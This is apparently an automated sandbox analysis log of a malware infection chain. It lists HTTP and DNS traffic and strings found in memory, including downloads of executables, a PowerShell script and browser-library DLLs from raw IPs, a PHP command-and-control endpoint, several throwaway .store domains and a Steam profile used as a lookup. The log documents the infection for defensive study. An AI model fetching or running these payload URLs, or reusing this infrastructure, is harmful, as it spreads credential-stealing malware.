Source: global traffic	HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=KM3zyh56Yr5CFe3&MD=OeGs9yZU HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /l.exe HTTP/1.1Host: freewaylumma.online
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: freewaylumma.onlineConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
Source: global traffic	HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
Source: global traffic	HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /?vhyneVXjVGxXWDBAHPFQ=vMcvSUhjRwUjZHoUBOuO.txt HTTP/1.1Host: cl.oud-cdn.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/file1.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/k4pDgO.ps1 HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Mon, 11 Nov 2024 22:52:56 GMTIf-None-Match: "67328ac8-1bb200"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowe equals www.youtube.com (Youtube)
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C80f26d8df816a964aafb6ec188b485ed; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=b8dd09ab4a897d9d4420b7ba; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35052Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 11 Nov 2024 23:07:37 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control@5 equals www.youtube.com (Youtube)
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: red.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: frogmen-smell.sbs
Source: global traffic	DNS traffic detected: DNS query: freewaylumma.online
Source: global traffic	DNS traffic detected: DNS query: cl.oud-cdn.de
Source: global traffic	DNS traffic detected: DNS query: presticitpo.store
Source: global traffic	DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic	DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic	DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic	DNS traffic detected: DNS query: necklacedmny.store
Source: global traffic	DNS traffic detected: DNS query: founpiuer.store
Source: global traffic	DNS traffic detected: DNS query: navygenerayk.store
Source: global traffic	DNS traffic detected: DNS query: scriptyprefej.store
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: marshal-zhukov.com

Source: unknown	DoH DNS queries detected: name: assets.msn.com
Source: unknown	DoH DNS queries detected: name: assets.msn.com
Source: unknown	DoH DNS queries detected: name: ntp.msn.com
Source: unknown	DoH DNS queries detected: name: ntp.msn.com

Source: unknown

HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 905sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: 4136f86ac7.exe, 00000025.00000003.3191607562.0000000001580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: skotes.exe, 00000017.00000002.3297166595.0000000001551000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000017.00000002.3297166595.0000000001551000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exey
Source: file.exe, 00000000.00000002.2412929391.0000000001180000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3192063647.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.000000000155F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 4136f86ac7.exe, 00000025.00000003.3192063647.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.000000000155F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exem
Source: skotes.exe, 00000017.00000002.3297166595.0000000001551000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 00000017.00000002.3297166595.0000000001551000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exeX
Source: 4136f86ac7.exe, 00000025.00000003.3191607562.0000000001580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ov
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.000000000155F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: 4136f86ac7.exe, 00000025.00000002.3261455776.00000000012FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeI
Source: skotes.exe, 00000017.00000002.3297166595.0000000001551000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeN
Source: 4136f86ac7.exe, 00000025.00000003.3192063647.0000000001564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeO
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exep
Source: file.exe, 00000000.00000002.2408418198.00000000004F7000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2412929391.00000000010AE000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.000000000155F000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/#
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/2c2e-da81-46d0-b6b6-535557bcc5faXX
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllwd
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll=dL
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllad
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dllLp
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.2412929391.00000000010F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: 4136f86ac7.exe, 0000001E.00000002.3123970475.00000000055F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/;
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/=z
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/H
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.000000000155F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php%WpO
Source: file.exe, 00000000.00000002.2412929391.0000000001180000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php-t/
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/9
Source: 4136f86ac7.exe, 0000001E.00000002.3123970475.00000000055F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/o
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/z
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php1
Source: file.exe, 00000000.00000002.2412929391.0000000001180000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php1t#
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php6
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpF
Source: file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpO
Source: 4136f86ac7.exe, 0000001E.00000002.3123970475.00000000055E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpR
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpV
Source: file.exe, 00000000.00000002.2412929391.0000000001180000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpYt;
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpZ
Source: 4136f86ac7.exe, 0000001E.00000002.3123970475.00000000055F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpa
Source: file.exe, 00000000.00000002.2408418198.00000000004F7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
Source: file.exe, 00000000.00000002.2412929391.0000000001122000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpd
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpiW
Source: file.exe, 00000000.00000002.2412929391.0000000001180000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpit
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpr
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpv
Source: 4136f86ac7.exe, 0000001E.00000002.3123970475.00000000055E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php~
